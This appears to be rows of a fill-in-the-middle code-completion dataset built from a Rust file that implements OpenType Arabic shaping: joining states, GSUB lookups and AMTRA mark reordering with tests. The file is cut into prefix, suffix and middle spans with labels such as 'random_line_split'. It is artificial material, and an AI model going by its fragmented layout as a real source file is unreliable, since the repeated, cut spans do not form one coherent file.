match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
} | #[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
} | }
| random_line_split |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) {
self.extra_data.feature_tag = feature_tag
}
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() |
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
}
| {
continue;
} | conditional_block |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) {
self.extra_data.feature_tag = feature_tag
}
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
